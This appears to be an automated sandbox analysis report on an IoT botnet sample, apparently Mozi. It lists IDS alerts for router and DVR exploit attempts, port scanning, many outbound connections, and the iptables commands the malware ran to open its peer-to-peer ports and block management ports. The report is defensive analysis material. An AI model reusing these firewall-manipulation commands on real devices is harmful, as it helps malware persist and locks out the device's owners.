              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32776 -> 23.236.242.26:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32776 -> 23.236.242.26:80
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.96.39.49:1027 -> 192.168.2.20:8987
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.96.55.112: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.50.198.5: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:54454 -> 23.12.191.118:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:54454 -> 23.12.191.118:80
              Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.191.118:80 -> 192.168.2.20:54454
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.255.14.222: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 131.100.27.86: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59832 -> 23.53.160.36:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59832 -> 23.53.160.36:80
              Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.160.36:80 -> 192.168.2.20:59832
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.7.89.221: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 149.28.33.22: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.222.29.194: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.221.222.106: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.99.187:63032 -> 192.168.2.20:8987
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 5.106.1.251:3317 -> 192.168.2.20:8987
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.61.90: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 63.148.112.178: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 212.149.148.17: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:39748 -> 2.22.143.222:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:39748 -> 2.22.143.222:80
              Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.22.143.222:80 -> 192.168.2.20:39748
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.241.192.161: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33236 -> 180.254.107.55:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33236 -> 180.254.107.55:80
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55722 -> 34.66.226.190:80
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:49434 -> 104.149.254.177:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:49434 -> 104.149.254.177:80
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.255.15.98: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.146.71: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53268 -> 104.103.19.232:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53268 -> 104.103.19.232:80
              Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.19.232:80 -> 192.168.2.20:53268
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45072 -> 77.238.74.163:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45072 -> 77.238.74.163:80
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37542 -> 176.119.128.106:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37542 -> 176.119.128.106:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.155.20.45: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.214.206: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.141.215.230: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.236.144.108: -> 192.168.2.20:
              Connects to many ports of the same IP (likely port scanning)Show sources
              Source: global trafficTCP traffic: 81.36.208.25 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 57.228.46.214 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 8.144.29.157 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 137.96.65.50 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 57.57.176.173 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 133.239.82.116 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 64.90.35.78 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 119.218.221.67 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 188.48.235.83 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 122.136.129.218 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 161.39.154.190 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 151.67.70.41 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 24.10.221.243 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 156.188.202.182 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 179.46.171.6 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 29.23.135.71 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 87.100.168.25 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 190.114.242.248 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 125.232.30.122 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 114.19.106.118 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 81.197.119.173 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 103.227.10.51 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 87.221.52.97 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 17.36.10.53 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 157.56.20.190 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 59.47.52.108 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 24.32.163.88 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 152.217.15.203 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 59.147.111.47 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 90.21.129.140 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 84.116.205.234 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 120.248.5.159 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 151.235.98.188 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 194.182.145.31 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 36.220.148.252 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 37.31.202.128 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 134.182.231.67 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 31.27.78.45 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 92.187.181.216 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 72.90.138.133 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 50.126.123.128 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 45.109.162.162 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 182.122.123.189 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 7.242.90.54 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 83.10.2.12 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 179.151.12.46 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 47.154.113.173 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 206.150.7.5 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 193.98.148.181 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 108.181.239.177 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 152.58.166.168 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 137.110.66.54 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 207.23.54.245 ports 2,5,6,8,9,52869
              Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
              Source: /bin/sh (PID: 4638)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 56274 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 56274
              Source: unknownNetwork traffic detected: HTTP traffic on port 45556 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 45556
              Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 39288
              Source: global trafficTCP traffic: 192.168.2.20:39886 -> 45.109.162.162:49152
              Source: global trafficTCP traffic: 192.168.2.20:46710 -> 69.11.36.124:5555
              Source: global trafficTCP traffic: 192.168.2.20:37588 -> 75.91.130.63:8080
              Source: global trafficTCP traffic: 192.168.2.20:46004 -> 195.153.28.200:8080
              Source: global trafficTCP traffic: 192.168.2.20:56840 -> 23.5.140.124:81
              Source: global trafficTCP traffic: 192.168.2.20:45716 -> 156.72.38.195:5555
              Source: global trafficTCP traffic: 192.168.2.20:43108 -> 195.115.84.245:8080
              Source: global trafficTCP traffic: 192.168.2.20:39264 -> 144.165.39.167:8080
              Source: global trafficTCP traffic: 192.168.2.20:54508 -> 209.72.224.1:7574
              Source: global trafficTCP traffic: 192.168.2.20:40212 -> 215.164.157.85:8080
              Source: global trafficTCP traffic: 192.168.2.20:36032 -> 148.150.251.31:8443
              Source: global trafficTCP traffic: 192.168.2.20:51812 -> 84.116.205.234:37215
              Source: global trafficTCP traffic: 192.168.2.20:37502 -> 47.62.131.40:81
              Source: global trafficTCP traffic: 192.168.2.20:36014 -> 35.9.95.44:7574
              Source: global trafficTCP traffic: 192.168.2.20:47396 -> 78.138.19.157:8080
              Source: global trafficTCP traffic: 192.168.2.20:47554 -> 211.98.218.197:8080
              Source: global trafficTCP traffic: 192.168.2.20:58296 -> 126.165.20.233:81
              Source: global trafficTCP traffic: 192.168.2.20:48618 -> 4.121.119.146:5555
              Source: global trafficTCP traffic: 192.168.2.20:33418 -> 7.242.90.54:37215
              Source: global trafficTCP traffic: 192.168.2.20:50076 -> 203.113.226.208:7574
              Source: global trafficTCP traffic: 192.168.2.20:34010 -> 156.188.202.182:49152
              Source: global trafficTCP traffic: 192.168.2.20:33218 -> 69.219.15.151:8080
              Source: global trafficTCP traffic: 192.168.2.20:42230 -> 84.49.106.247:8080
              Source: global trafficTCP traffic: 192.168.2.20:45606 -> 83.10.2.12:52869
              Source: global trafficTCP traffic: 192.168.2.20:48022 -> 88.107.197.218:81
              Source: global trafficTCP traffic: 192.168.2.20:44074 -> 137.96.65.50:52869
              Source: global trafficTCP traffic: 192.168.2.20:37258 -> 57.57.176.173:52869
              Source: global trafficTCP traffic: 192.168.2.20:46580 -> 103.227.10.51:37215
              Source: global trafficTCP traffic: 192.168.2.20:36088 -> 110.232.182.70:8080
              Source: global trafficTCP traffic: 192.168.2.20:52444 -> 94.151.112.236:8080
              Source: global trafficTCP traffic: 192.168.2.20:36744 -> 162.238.7.116:8080
              Source: global trafficTCP traffic: 192.168.2.20:36118 -> 92.54.230.127:8443
              Source: global trafficTCP traffic: 192.168.2.20:46806 -> 84.40.114.1:8443
              Source: global trafficTCP traffic: 192.168.2.20:45158 -> 82.129.200.140:5555
              Source: global trafficTCP traffic: 192.168.2.20:50110 -> 125.111.112.230:8080
              Source: global trafficTCP traffic: 192.168.2.20:55372 -> 70.220.45.231:8080
              Source: global trafficTCP traffic: 192.168.2.20:37030 -> 198.118.3.130:8080
              Source: global trafficTCP traffic: 192.168.2.20:56686 -> 200.237.209.54:81
              Source: global trafficTCP traffic: 192.168.2.20:54686 -> 81.197.119.173:49152
              Source: global trafficTCP traffic: 192.168.2.20:52128 -> 133.239.82.116:49152
              Source: global trafficTCP traffic: 192.168.2.20:59126 -> 98.157.141.146:7574
              Source: global trafficTCP traffic: 192.168.2.20:58796 -> 57.92.156.14:81
              Source: global trafficTCP traffic: 192.168.2.20:33930 -> 113.188.1.54:8080
              Source: global trafficTCP traffic: 192.168.2.20:35144 -> 181.104.75.138:8080
              Source: global trafficTCP traffic: 192.168.2.20:60284 -> 47.248.165.151:8443
              Source: global trafficTCP traffic: 192.168.2.20:36134 -> 72.90.138.133:52869
              Source: global trafficTCP traffic: 192.168.2.20:52484 -> 194.182.145.31:49152
              Source: global trafficTCP traffic: 192.168.2.20:43750 -> 185.2.174.16:81
              Source: global trafficTCP traffic: 192.168.2.20:42568 -> 117.21.241.151:5555
              Source: global trafficTCP traffic: 192.168.2.20:47142 -> 180.5.162.155:8080
              Source: global trafficTCP traffic: 192.168.2.20:55012 -> 182.237.85.66:8080
              Source: global trafficTCP traffic: 192.168.2.20:44776 -> 199.246.152.166:5555
              Source: global trafficTCP traffic: 192.168.2.20:34774 -> 210.53.199.85:8080
              Source: global trafficTCP traffic: 192.168.2.20:33624 -> 212.221.62.64:7574
              Source: global trafficTCP traffic: 192.168.2.20:36926 -> 156.96.88.80:8080
              Source: global trafficTCP traffic: 192.168.2.20:45316 -> 132.37.211.32:8080
              Source: global trafficTCP traffic: 192.168.2.20:40466 -> 175.234.148.74:49152
              Source: global trafficTCP traffic: 192.168.2.20:49152 -> 14.221.63.65:5555
              Source: global trafficTCP traffic: 192.168.2.20:50354 -> 174.73.164.213:8080
              Source: global trafficTCP traffic: 192.168.2.20:50416 -> 29.23.135.71:49152
              Source: global trafficTCP traffic: 192.168.2.20:34532 -> 69.233.249.60:7574
              Source: global trafficTCP traffic: 192.168.2.20:46394 -> 160.55.151.92:5555
              Source: global trafficTCP traffic: 192.168.2.20:44238 -> 35.21.51.146:7574
              Source: global trafficTCP traffic: 192.168.2.20:59442 -> 32.147.42.65:8443
              Source: global trafficTCP traffic: 192.168.2.20:43632 -> 33.2.251.75:8080
              Source: global trafficTCP traffic: 192.168.2.20:54614 -> 183.218.103.29:5555
              Source: global trafficTCP traffic: 192.168.2.20:39410 -> 5.75.227.209:5555
              Source: global trafficTCP traffic: 192.168.2.20:38294 -> 199.215.82.120:5555
              Source: global trafficTCP traffic: 192.168.2.20:50336 -> 17.36.10.53:49152
              Source: global trafficTCP traffic: 192.168.2.20:60594 -> 134.182.231.67:49152
              Source: global trafficTCP traffic: 192.168.2.20:42208 -> 122.136.129.218:37215
              Source: global trafficTCP traffic: 192.168.2.20:36418 -> 120.248.5.159:52869
              Source: global trafficTCP traffic: 192.168.2.20:51006 -> 59.147.111.47:37215
              Source: global trafficTCP traffic: 192.168.2.20:60616 -> 164.16.139.252:8080
              Source: global trafficTCP traffic: 192.168.2.20:34832 -> 161.198.22.163:81
              Source: global trafficTCP traffic: 192.168.2.20:38982 -> 87.221.52.97:37215
              Source: global trafficTCP traffic: 192.168.2.20:39046 -> 152.217.15.203:37215
              Source: global trafficTCP traffic: 192.168.2.20:59110 -> 179.46.171.6:49152
              Source: global trafficTCP traffic: 192.168.2.20:41674 -> 47.241.133.101:5555
              Source: global trafficTCP traffic: 192.168.2.20:52176 -> 90.191.172.75:8080
              Source: global trafficTCP traffic: 192.168.2.20:39414 -> 182.122.123.189:49152
              Source: global trafficTCP traffic: 192.168.2.20:41420 -> 177.72.194.158:8443
              Source: global trafficTCP traffic: 192.168.2.20:59910 -> 28.185.19.176:5555
              Source: global trafficTCP traffic: 192.168.2.20:35456 -> 115.97.124.91:7574
              Source: global trafficTCP traffic: 192.168.2.20:50338 -> 105.237.227.224:81
              Source: global trafficTCP traffic: 192.168.2.20:48948 -> 39.81.227.198:8080
              Source: global trafficTCP traffic: 192.168.2.20:41430 -> 66.201.80.188:8080
              Source: global trafficTCP traffic: 192.168.2.20:34458 -> 152.11.107.226:81
              Source: global trafficTCP traffic: 192.168.2.20:44704 -> 108.181.239.177:49152
              Source: global trafficTCP traffic: 192.168.2.20:48224 -> 144.243.16.74:8443
              Source: global trafficTCP traffic: 192.168.2.20:53252 -> 142.30.167.231:5555
              Source: global trafficTCP traffic: 192.168.2.20:46698 -> 175.225.140.166:8080
              Source: global trafficTCP traffic: 192.168.2.20:46056 -> 123.30.61.15:5555
              Source: global trafficTCP traffic: 192.168.2.20:37566 -> 59.207.221.29:81
              Source: global trafficTCP traffic: 192.168.2.20:59874 -> 31.27.78.45:49152
              Source: global trafficTCP traffic: 192.168.2.20:58714 -> 122.160.28.146:8080
              Source: global trafficTCP traffic: 192.168.2.20:48538 -> 16.41.220.208:8080
              Source: global trafficTCP traffic: 192.168.2.20:42676 -> 57.228.46.214:37215
              Source: global trafficTCP traffic: 192.168.2.20:35054 -> 37.31.202.128:37215
              Source: global trafficTCP traffic: 192.168.2.20:39548 -> 58.55.207.152:5555
              Source: global trafficTCP traffic: 192.168.2.20:53082 -> 136.159.183.246:81
              Source: global trafficTCP traffic: 192.168.2.20:35372 -> 103.149.102.18:5555
              Source: global trafficTCP traffic: 192.168.2.20:40768 -> 33.222.3.31:8080
              Source: global trafficTCP traffic: 192.168.2.20:50498 -> 181.103.164.25:8080
              Source: global trafficTCP traffic: 192.168.2.20:41894 -> 87.100.168.25:52869
              Source: global trafficTCP traffic: 192.168.2.20:44810 -> 58.241.10.153:8080
              Source: global trafficTCP traffic: 192.168.2.20:46690 -> 200.95.166.57:8080
              Source: global trafficTCP traffic: 192.168.2.20:45894 -> 130.112.113.117:81
              Source: global trafficTCP traffic: 192.168.2.20:51580 -> 8.144.29.157:49152
              Source: global trafficTCP traffic: 192.168.2.20:52666 -> 42.53.124.99:7574
              Source: global trafficTCP traffic: 192.168.2.20:54812 -> 197.15.200.93:8080
              Source: global trafficTCP traffic: 192.168.2.20:49378 -> 24.32.163.88:37215
              Source: global trafficTCP traffic: 192.168.2.20:41856 -> 90.21.129.140:37215
              Source: global trafficTCP traffic: 192.168.2.20:47622 -> 37.64.42.1:5555
              Source: global trafficTCP traffic: 192.168.2.20:39988 -> 205.77.80.43:81
              Source: global trafficTCP traffic: 192.168.2.20:39860 -> 203.1.53.83:7574
              Source: global trafficTCP traffic: 192.168.2.20:44828 -> 47.154.113.173:37215
              Source: global trafficTCP traffic: 192.168.2.20:35354 -> 152.58.166.168:49152
              Source: global trafficTCP traffic: 192.168.2.20:47132 -> 213.40.140.209:81
              Source: global trafficTCP traffic: 192.168.2.20:57736 -> 145.8.33.105:8080
              Source: global trafficTCP traffic: 192.168.2.20:60134 -> 28.253.173.25:7574
              Source: global trafficTCP traffic: 192.168.2.20:56872 -> 201.27.168.240:8080
              Source: global trafficTCP traffic: 192.168.2.20:34020 -> 206.155.249.74:5555
              Source: global trafficTCP traffic: 192.168.2.20:40352 -> 76.113.174.12:8080
              Source: global trafficTCP traffic: 192.168.2.20:49478 -> 218.171.135.173:8080
              Source: global trafficTCP traffic: 192.168.2.20:36712 -> 65.17.42.27:81
              Source: global trafficTCP traffic: 192.168.2.20:33800 -> 62.211.221.129:8080
              Source: global trafficTCP traffic: 192.168.2.20:45322 -> 151.184.228.232:5555
              Source: global trafficTCP traffic: 192.168.2.20:51276 -> 197.118.111.71:8080
              Source: global trafficTCP traffic: 192.168.2.20:44636 -> 157.56.20.190:52869
              Source: global trafficTCP traffic: 192.168.2.20:43284 -> 190.242.154.163:8443
              Source: global trafficTCP traffic: 192.168.2.20:60544 -> 209.217.136.33:8443
              Source: global trafficTCP traffic: 192.168.2.20:53088 -> 197.34.177.11:7574
              Source: global trafficTCP traffic: 192.168.2.20:42104 -> 200.11.181.4:8080
              Source: global trafficTCP traffic: 192.168.2.20:59404 -> 138.165.59.57:5555
              Source: global trafficTCP traffic: 192.168.2.20:46302 -> 214.142.165.206:8080
              Source: global trafficTCP traffic: 192.168.2.20:47772 -> 162.47.171.24:81
              Source: global trafficTCP traffic: 192.168.2.20:39376 -> 133.102.114.241:8443
              Source: global trafficTCP traffic: 192.168.2.20:42298 -> 47.185.80.40:7574
              Source: global trafficTCP traffic: 192.168.2.20:48118 -> 146.102.243.179:8080
              Source: global trafficTCP traffic: 192.168.2.20:34552 -> 126.3.6.151:8080
              Source: global trafficTCP traffic: 192.168.2.20:48666 -> 161.135.213.110:8080
              Source: global trafficTCP traffic: 192.168.2.20:46100 -> 147.52.239.132:8080
              Source: global trafficTCP traffic: 192.168.2.20:59478 -> 16.110.179.40:81
              Source: global trafficTCP traffic: 192.168.2.20:40970 -> 51.227.15.209:5555
              Source: global trafficTCP traffic: 192.168.2.20:36536 -> 61.139.164.151:7574
              Source: global trafficTCP traffic: 192.168.2.20:37048 -> 36.220.148.252:52869
              Source: global trafficTCP traffic: 192.168.2.20:59440 -> 109.74.141.76:81
              Source: global trafficTCP traffic: 192.168.2.20:48834 -> 159.220.41.142:8080
              Source: global trafficTCP traffic: 192.168.2.20:34748 -> 56.129.128.4:8443
              Source: global trafficTCP traffic: 192.168.2.20:40680 -> 165.253.189.217:7574
              Source: global trafficTCP traffic: 192.168.2.20:41478 -> 109.143.31.175:8080
              Source: global trafficTCP traffic: 192.168.2.20:58770 -> 53.225.147.229:81
              Source: global trafficTCP traffic: 192.168.2.20:38008 -> 179.151.12.46:37215
              Source: global trafficTCP traffic: 192.168.2.20:53420 -> 39.113.188.47:5555
              Source: global trafficTCP traffic: 192.168.2.20:45746 -> 137.110.66.54:37215
              Source: global trafficTCP traffic: 192.168.2.20:56722 -> 58.72.15.174:7574
              Source: global trafficTCP traffic: 192.168.2.20:57116 -> 37.24.4.73:8080
              Source: global trafficTCP traffic: 192.168.2.20:41086 -> 133.159.154.248:5555
              Source: global trafficTCP traffic: 192.168.2.20:51276 -> 177.96.47.102:8080
              Source: global trafficTCP traffic: 192.168.2.20:33854 -> 164.132.96.134:8080
              Source: global trafficTCP traffic: 192.168.2.20:43502 -> 169.217.227.38:81
              Source: global trafficTCP traffic: 192.168.2.20:39492 -> 176.120.19.238:81
              Source: global trafficTCP traffic: 192.168.2.20:38436 -> 146.40.106.239:5555
              Source: global trafficTCP traffic: 192.168.2.20:59770 -> 207.23.54.245:52869
              Source: global trafficTCP traffic: 192.168.2.20:34510 -> 50.126.123.128:52869
              Source: global trafficTCP traffic: 192.168.2.20:33606 -> 151.67.70.41:49152
              Source: global trafficTCP traffic: 192.168.2.20:49222 -> 8.168.18.238:5555
              Source: global trafficTCP traffic: 192.168.2.20:55430 -> 161.39.154.190:37215
              Source: global trafficTCP traffic: 192.168.2.20:50260 -> 77.125.96.189:8080
              Source: global trafficTCP traffic: 192.168.2.20:38300 -> 128.99.168.15:8080
              Source: global trafficTCP traffic: 192.168.2.20:57658 -> 47.41.35.192:8080
